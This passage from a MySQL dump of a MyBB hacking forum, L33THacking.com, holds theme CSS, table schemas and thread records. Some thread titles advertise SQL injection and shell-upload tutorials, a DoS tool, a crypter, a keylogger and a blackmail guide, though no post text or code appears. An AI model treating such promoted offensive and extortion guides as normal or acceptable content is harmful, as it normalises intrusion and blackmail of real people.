url(images/CoderGreen/usercp/trash_pmfolder.gif) no-repeat left center; padding-left: 40px; } .usercp_nav_pmtracking { background: url(images/CoderGreen/usercp/pmtracking.gif) no-repeat left center; } .usercp_nav_pmfolders { background: url(images/CoderGreen/usercp/editfolders.gif) no-repeat left center; } .usercp_nav_profile { background: url(images/CoderGreen/usercp/profile.gif) no-repeat left center; } .usercp_nav_email { background: url(images/CoderGreen/usercp/email.gif) no-repeat left center; padding-left: 40px; } .usercp_nav_password { background: url(images/CoderGreen/usercp/password.gif) no-repeat left center; padding-left: 40px; } .usercp_nav_username { background: url(images/CoderGreen/usercp/username.gif) no-repeat left center; padding-left: 40px; } .usercp_nav_editsig { background: url(images/CoderGreen/usercp/editsig.gif) no-repeat left center; padding-left: 40px; } .usercp_nav_avatar { background: url(images/CoderGreen/usercp/avatar.gif) no-repeat left center; padding-left: 40px; } .usercp_nav_options { background: url(images/CoderGreen/usercp/options.gif) no-repeat left center; } .usercp_nav_usergroups { background: url(images/CoderGreen/usercp/usergroups.gif) no-repeat left center; } .usercp_nav_editlists { background: url(images/CoderGreen/usercp/editlists.gif) no-repeat left center; } .usercp_nav_attachments { background: url(images/CoderGreen/usercp/attachments.gif) no-repeat left center; } .usercp_nav_drafts { background: url(images/CoderGreen/usercp/drafts.gif) no-repeat left center; } .usercp_nav_subscriptions { background: url(images/CoderGreen/usercp/subscriptions.gif) no-repeat left center; } .usercp_nav_fsubscriptions { background: url(images/CoderGreen/usercp/fsubscriptions.gif) no-repeat left center; } .usercp_nav_notepad { background: url(images/CoderGreen/usercp/notepad.gif) no-repeat left center; } .usercp_nav_viewprofile { background: url(images/CoderGreen/usercp/viewprofile.gif) no-repeat left center; } .usercp_nav_home { background: url(images/CoderGreen/usercp/home.gif) no-repeat left center; } .usercp_notepad { width: 99%; } .usercp_container { margin: 5px; padding: 8px; border:1px solid #CCCCCC; } .usercp_nav_profile { background: url(images/CoderGreen/usercp/profile.gif) no-repeat left center; } ', 'usercp.css', '1344112598'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('32', 'modcp.css', '10', 'modcp.php', ' .modcp_nav_item { display: block; padding: 1px 0 1px 23px; } .modcp_nav_home { background: url(images/CoderGreen/modcp/home.gif) no-repeat left center; } .modcp_nav_announcements { background: url(images/CoderGreen/modcp/announcements.gif) no-repeat left center; } .modcp_nav_reports { background: url(images/CoderGreen/modcp/reports.gif) no-repeat left center; } .modcp_nav_modqueue { background: url(images/CoderGreen/modcp/modqueue.gif) no-repeat left center; } .modcp_nav_modlogs { background: url(images/CoderGreen/modcp/modlogs.gif) no-repeat left center; } .modcp_nav_editprofile { background: url(images/CoderGreen/modcp/editprofile.gif) no-repeat left center; } .modcp_nav_banning { background: url(images/CoderGreen/modcp/banning.gif) no-repeat left center; } .modcp_nav_warninglogs { background: url(images/CoderGreen/modcp/warninglogs.gif) no-repeat left center; } .modcp_nav_ipsearch { background: url(images/CoderGreen/modcp/ipsearch.gif) no-repeat left center; } .modqueue_message { overflow: auto; max-height: 250px; } .modqueue_controls { width: 270px; float: right; text-align: center; border: 1px solid #ccc; background: #fff; padding: 6px; font-weight: bold; } .modqueue_controls label { margin-right: 8px; } .label_radio_ignore, .label_radio_delete, .label_radio_approve { font-weight: bold; } .modqueue_meta { color: #444; font-size: 95%; margin-bottom: 8px; } .modqueue_mass { list-style: none; margin: 0; width: 150px; padding: 0; } .modqueue_mass li { margin-bottom: 4px; padding: 0; } .modqueue_mass li a { display: block; padding: 4px; border: 1px solid transparent; } .modqueue_mass li a:hover { background: #efefef; border: 1px solid #ccc; text-decoration: none; } ', 'modcp.css', '1343925064'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('33', 'star_ratings.css', '10', 'forumdisplay.php|showthread.php', ' .star_rating, .star_rating li a:hover, .star_rating .current_rating { background: url(images/CoderGreen/star_rating.gif) left -1000px repeat-x; vertical-align: middle; } .star_rating { position: relative; width:80px; height:16px; overflow: hidden; list-style: none; margin: 0; padding: 0; background-position: left top; } td .star_rating { margin: auto; } .star_rating li { display: inline; } .star_rating li a, .star_rating .current_rating { position: absolute; text-indent: -1000px; height: 16px; line-height: 16px; outline: none; overflow: hidden; border: none; top:0; left:0; } .star_rating_notrated li a:hover { background-position: left bottom; } .star_rating li a.one_star { width:20%; z-index:6; } .star_rating li a.two_stars { width:40%; z-index:5; } .star_rating li a.three_stars { width:60%; z-index:4; } .star_rating li a.four_stars { width:80%; z-index:3; } .star_rating li a.five_stars { width:100%; z-index:2; } .star_rating .current_rating { z-index:1; background-position: left center; } .star_rating_success, .success_message { color: #00b200; font-weight: bold; font-size: 10px; margin-bottom: 10px; } .inline_rating { background: url(images/CoderGreen/star_rating.gif) left -1000px repeat-x; width: 210px; vertical-align: middle; } ', 'star_ratings.css', '1343925064'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('34', 'showthread.css', '10', 'showthread.php', ' ul.thread_tools, ul.thread_tools li { list-style: none; padding: 0; margin: 0; } ul.thread_tools li { padding-left: 26px; padding-bottom: 4px; margin-bottom: 3px; font-size: 11px; } ul.thread_tools li.printable { background: url(images/CoderGreen/printable.gif) no-repeat 0px 0px; } ul.thread_tools li.sendthread { background: url(images/CoderGreen/send.gif) no-repeat 0px 0px; } ul.thread_tools li.subscription_add { background: url(images/CoderGreen/subscribe.gif) no-repeat 0px 0px; } ul.thread_tools li.subscription_remove { background: url(images/CoderGreen/unsubscribe.gif) no-repeat 0px 0px; } ', 'showthread.css', '1343925064'); INSERT INTO `mybb_themestylesheets` (`sid`, `name`, `tid`, `attachedto`, `stylesheet`, `cachefile`, `lastmodified`) VALUES ('35', 'tabbed.css', '10', 'index.php', ' .shadetabs { padding: 3px 0; margin-left: 0; margin-top: 1px; margin-bottom: 0; font: bold 12px Verdana; list-style-type: none; text-align: left; /*set to left, center, or right to align the menu as desired*/ } .shadetabs li { display: inline; margin: 0; } .shadetabs li a { background: #298A08 url(images/CoderGreen/tabs.png) top left repeat-x;; color: #ffffff; -webkit-border-top-left-radius: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-topleft: 5px; -moz-border-radius-topright: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; position: relative; z-index: 1; padding: 3px 7px; margin-right: 3px; border: 1px solid #778; text-decoration: none; } .shadetabs li a:hover { text-decoration: underline; } .shadetabs li a.selected { /*selected main tab style */ position: relative; top: 1px; } .shadetabs li a.selected { background: #298A08 url(images/CoderGreen/tabs.png) top left repeat-x;; color: #ffffff; -webkit-border-top-left-radius: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-topleft: 5px; -moz-border-radius-topright: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border-bottom-color: #81A2C4; } .shadetabs li a.selected:hover { /*selected main tab style */ text-decoration: none; } .tabcontent { display:none; } @ media print { .tabcontent { display:block !important; } } ', 'tabbed.css', '1344967962'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_threadprefixes`; CREATE TABLE `mybb_threadprefixes` ( `pid` int(10) unsigned NOT NULL AUTO_INCREMENT, `prefix` varchar(120) NOT NULL DEFAULT '', `displaystyle` varchar(200) NOT NULL DEFAULT '', `forums` text NOT NULL, `groups` text NOT NULL, PRIMARY KEY (`pid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_threadprefixes` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_threadratings`; CREATE TABLE `mybb_threadratings` ( `rid` int(10) unsigned NOT NULL AUTO_INCREMENT, `tid` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `rating` smallint(5) unsigned NOT NULL DEFAULT '0', `ipaddress` varchar(30) NOT NULL DEFAULT '', PRIMARY KEY (`rid`), KEY `tid` (`tid`,`uid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_threadratings` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_threads`; CREATE TABLE `mybb_threads` ( `tid` int(10) unsigned NOT NULL AUTO_INCREMENT, `fid` smallint(5) unsigned NOT NULL DEFAULT '0', `subject` varchar(120) NOT NULL DEFAULT '', `prefix` smallint(5) unsigned NOT NULL DEFAULT '0', `icon` smallint(5) unsigned NOT NULL DEFAULT '0', `poll` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `username` varchar(80) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', `firstpost` int(10) unsigned NOT NULL DEFAULT '0', `lastpost` bigint(30) NOT NULL DEFAULT '0', `lastposter` varchar(120) NOT NULL DEFAULT '', `lastposteruid` int(10) unsigned NOT NULL DEFAULT '0', `views` int(100) NOT NULL DEFAULT '0', `replies` int(100) NOT NULL DEFAULT '0', `closed` varchar(30) NOT NULL DEFAULT '', `sticky` int(1) NOT NULL DEFAULT '0', `numratings` smallint(5) unsigned NOT NULL DEFAULT '0', `totalratings` smallint(5) unsigned NOT NULL DEFAULT '0', `notes` text NOT NULL, `visible` int(1) NOT NULL DEFAULT '0', `unapprovedposts` int(10) unsigned NOT NULL DEFAULT '0', `attachmentcount` int(10) unsigned NOT NULL DEFAULT '0', `deletetime` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`tid`), KEY `fid` (`fid`,`visible`,`sticky`), KEY `dateline` (`dateline`), KEY `lastpost` (`lastpost`,`fid`), KEY `firstpost` (`firstpost`), KEY `uid` (`uid`), FULLTEXT KEY `subject` (`subject`) ) ENGINE=MyISAM AUTO_INCREMENT=1262 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_threads` WRITE; INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1', '2', 'tggfg', '0', '0', '0', '1', 't3h jok3r', '1339740375', '1', '1339998836', 't3h jok3r', '1', '40', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('2', '34', 'Userbar tut', '0', '0', '0', '2', 'Apathy', '1339911671', '4', '1350875414', 'Exposé', '222', '145', '13', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('3', '19', '[Junk]Official Site Rules', '0', '0', '0', '3', '??????????¢™', '1339989731', '7', '1350169128', 't3h jok3r', '1', '87', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('4', '12', 'How to stay anonymous and how to protect your info over the internet (basics)', '0', '0', '0', '2', 'Apathy', '1339990220', '8', '1342390102', 't3h jok3r', '1', '44', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('6', '4', 'Welcome to L33THacking.com', '0', '0', '0', '1', 't3h jok3r', '1339994562', '14', '1344966038', 't3h jok3r', '1', '41', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('5', '16', 'How to spot a liar', '0', '0', '0', '2', 'Apathy', '1339991477', '12', '1340077866', 'Triple H', '4', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('9', '19', 'tggfg', '0', '0', '0', '2', 'Apathy', '1339907807', '3', '1339907807', 'Apathy', '2', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('8', '19', '[Junk]test for j', '0', '0', '0', '1', 't3h jok3r', '1339998552', '18', '1339998582', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('10', '5', '[tut]How to moderate L33THacking', '0', '0', '0', '1', 't3h jok3r', '1340001648', '21', '1344027571', 'Hil', '27', '43', '6', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('15', '9', 'Adf.ly>Earn $$$ by clicks on links', '0', '0', '0', '4', 'Triple H', '1340078109', '41', '1340833510', 'Triple H', '4', '26', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('11', '15', '.EXE Booter Pack', '0', '0', '0', '3', '??????????¢™', '1340055626', '28', '1346503511', 'Jacob', '160', '38', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('12', '35', 'L33THacking userbar competition between t3h jok3r and apathy', '0', '0', '0', '1', 't3h jok3r', '1340066415', '32', '1340142283', '??????????¢™', '3', '40', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('13', '4', 'newbie', '0', '0', '0', '4', 'Triple H', '1340077670', '38', '1340317240', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('14', '8', 'Work Hard Play Hard-Rap', '0', '0', '0', '4', 'Triple H', '1340077789', '39', '1345143271', 'p420', '9', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('16', '11', 'Is Hacking legal or illegal?', '0', '0', '0', '4', 'Triple H', '1340078190', '42', '1345938106', 'duhuh', '90', '21', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('19', '16', '[tut]How to SE your school teachers', '0', '0', '0', '4', 'Triple H', '1340515684', '54', '1352521492', 'Timmy', '5', '37', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('17', '8', 'My Dubstep Remixs', '0', '0', '0', '3', '??????????¢™', '1340081822', '46', '1349026715', '??????????¢™', '3', '36', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('26', '17', '[tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '0', '0', '1', 't3h jok3r', '1341181178', '79', '1345937077', 't3h jok3r', '1', '44', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('18', '2', 'star test', '0', '0', '0', '1', 't3h jok3r', '1340143700', '49', '1347647046', 't3h jok3r', '1', '13', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('20', '13', 'SQL Injection Tutorial (Step-by-Step)', '0', '0', '0', '5', 'Timmy', '1340517446', '57', '1340593391', 't3h jok3r', '1', '31', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('21', '16', '[GUIDE] In-depth reading of body language.', '0', '0', '0', '2', 'Apathy', '1340568256', '59', '1340833672', 'Triple H', '4', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('22', '14', 'Cyberghost VPN (Free/Premium)', '0', '0', '0', '1', 't3h jok3r', '1340594542', '62', '1347493698', 'iTzIpod', '82', '28', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('23', '11', 'Can someone tell me what\'s the difference between a proxy and VPN?', '0', '0', '0', '5', 'Timmy', '1340595366', '66', '1340833246', 'Timmy', '5', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('24', '12', '240 Monetizing and hacking ebooks.', '0', '0', '0', '2', 'Apathy', '1340764927', '69', '1345868955', 'iTzIpod', '82', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('25', '19', '[Junk]Blackhat System Scanner', '0', '0', '0', '5', 'Timmy', '1340833180', '71', '1346798045', 't3h jok3r', '1', '31', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('27', '13', '[TuT] Upload Shell Through SQL Injection', '0', '0', '0', '5', 'Timmy', '1341182787', '80', '1341182787', 'Timmy', '5', '19', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('28', '3', 'Buttons updated.', '0', '0', '0', '1', 't3h jok3r', '1341434168', '82', '1344287989', 'khade009', '17', '17', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('29', '15', '???Italian DoS tool (Great for hitting sites offline)???', '0', '0', '0', '1', 't3h jok3r', '1341434810', '83', '1346259799', 'HoverCatz', '67', '68', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('30', '12', 'HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '0', '0', '4', 'Triple H', '1341435898', '84', '1350940383', 'NXK', '61', '32', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('31', '7', 'How long are you online daily?', '0', '0', '0', '4', 'Triple H', '1341436045', '86', '1345817656', 'iTzIpod', '82', '24', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('32', '16', '[tut]How to SE Amazon Kindles', '0', '0', '0', '5', 'Timmy', '1341437012', '87', '1345937646', 'Timmy', '5', '40', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('33', '20', 'Heavens Crypter FUD', '0', '0', '0', '5', 'Timmy', '1341437435', '88', '1344547811', 't3h jok3r', '1', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('34', '3', 'L33THACKING.com is Back', '0', '0', '0', '1', 't3h jok3r', '1342041316', '93', '1342041316', 't3h jok3r', '1', '14', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('35', '4', 'Reminiscing ?\'s Landed', '0', '0', '0', '11', 'Reminiscing ?', '1342041433', '94', '1342102341', 't3h jok3r', '1', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('36', '2', 'Attachments', '0', '0', '0', '1', 't3h jok3r', '1342105715', '96', '1342105715', 't3h jok3r', '1', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('37', '5', 'Updates for 7/12/12', '0', '0', '0', '1', 't3h jok3r', '1342107856', '97', '1342107856', 't3h jok3r', '1', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('38', '16', '[tut] How to lie like a pro', '0', '0', '0', '1', 't3h jok3r', '1342112159', '98', '1347765694', 'iTzIpod', '82', '42', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, 